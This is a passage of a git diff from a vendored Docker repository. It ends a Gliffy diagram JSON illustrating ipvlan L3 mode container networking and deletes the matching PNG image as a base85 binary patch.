Host</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":28.93295288085936,"rotation":0.0,"id":278,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":17,"lockAspectRatio":false,"lockShape":false,"constraints":{"constraints":[],"startConstraint":{"type":"StartPositionConstraint","StartPositionConstraint":{"nodeId":290,"py":0.5,"px":0.5}},"endConstraint":{"type":"EndPositionConstraint","EndPositionConstraint":{"nodeId":246,"py":0.5,"px":0.5}}},"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#000000","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[217.5,167.06704711914062],[219.11774189711457,53.02855906766992]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":57.51435447730654,"y":10.461511948529278,"rotation":0.0,"id":246,"width":343.20677483961606,"height":143.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":18,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#434343","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":106.0,"y":55.19999694824217,"rotation":0.0,"id":262,"width":262.0,"height":75.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":22,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:13px;\">Unless notified about the container networks, the physical network does not have a route to their subnets</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;font-weight:bold;\">Who has 10.16.20.0/24?</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;font-weight:bold;\">Who has 10.1.20.0/24?</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.0,"y":403.5,"rotation":0.0,"id":282,"width":442.0,"height":18.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":23,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:16px;font-style:italic;\">Containers can be on different subnets and reach each other</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":106.0,"y":252.5,"rotation":0.0,"id":288,"width":238.0,"height":22.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":24,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:20px;font-weight:bold;\">&nbsp;Ipvlan&nbsp;</span><span style=\"font-size:20px;font-weight:bold;\">L3 Mode</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":124.0,"y":172.0,"rotation":0.0,"id":290,"width":207.0,"height":48.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":25,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#cccccc","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":1.0,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":3.568965517241383,"y":0.0,"rotation":0.0,"id":291,"width":199.86206896551747,"height":42.0,"uid":null,"order":27,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-weight:bold;\">Eth0</span></p><p style=\"text-align:center;\"><span style=\"font-weight:bold;\">192.168.50.10/24</span></p><p style=\"text-align:center;\"><span style=\"\">Parent interface acts as a <span style=\"font-weight:bold;\">Router</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":29.0,"y":358.1999969482422,"rotation":0.0,"id":304,"width":390.99999999999994,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":29,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;\">All containers can ping each other <span style=\"font-weight:bold;\">without</span> a router if </span></p><p style=\"text-align:center;\"><span style=\"font-size:14px;\">they share the <span style=\"font-weight:bold;\">same</span> parent interface (<span style=\"font-style:italic;\">example eth0)</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":24.0,"y":276.0,"rotation":0.0,"id":320,"width":134.0,"height":77.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":48,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":316,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[{"x":2.279999999999999,"y":0.0,"rotation":0.0,"id":317,"width":109.44000000000001,"height":43.0,"uid":null,"order":47,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Container(s)</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">Eth0&nbsp;</span></span></p><p style=\"text-align:center;\"><span style=\"font-weight:bold;\">172.16.20.x/24</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":10.0,"rotation":0.0,"id":318,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":20.0,"rotation":0.0,"id":319,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":40,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":300.0,"y":276.0,"rotation":0.0,"id":321,"width":134.0,"height":77.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":49,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":272,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":35,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[{"x":2.279999999999999,"y":0.0,"rotation":0.0,"id":273,"width":109.44000000000001,"height":44.0,"uid":null,"order":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Container(s)</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">Eth0 <span style=\"font-weight:bold;\">10.1.20.x/24</span></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":10.0,"rotation":0.0,"id":310,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":33,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":20.0,"rotation":0.0,"id":312,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":368.0,"y":85.93295288085938,"rotation":0.0,"id":322,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":50,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#434343","fillColor":"none","dashStyle":"4.0,4.0","startArrow":2,"endArrow":2,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-191.0,222.06704711914062],[-80.9272967534639,222.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":167.0,"y":25.499999999999986,"rotation":0.0,"id":323,"width":135.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":51,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;font-weight:bold;font-family:Arial;\">Physical Network</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":53}],"shapeStyles":{},"lineStyles":{"global":{"fill":"none","stroke":"#434343","strokeWidth":2,"dashStyle":"4.0,4.0","startArrow":2,"endArrow":2,"orthoMode":2}},"textStyles":{"global":{"face":"Arial","size":"13px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.basic.basic_v1.default","com.gliffy.libraries.flowchart.flowchart_v1.default","com.gliffy.libraries.swimlanes.swimlanes_v1.default","com.gliffy.libraries.images","com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1458117032939,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}}
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png
deleted file mode 100644
index 3227a83ca1541ec68e06b0aa105e22fdf5ae9e6f..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 18260
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
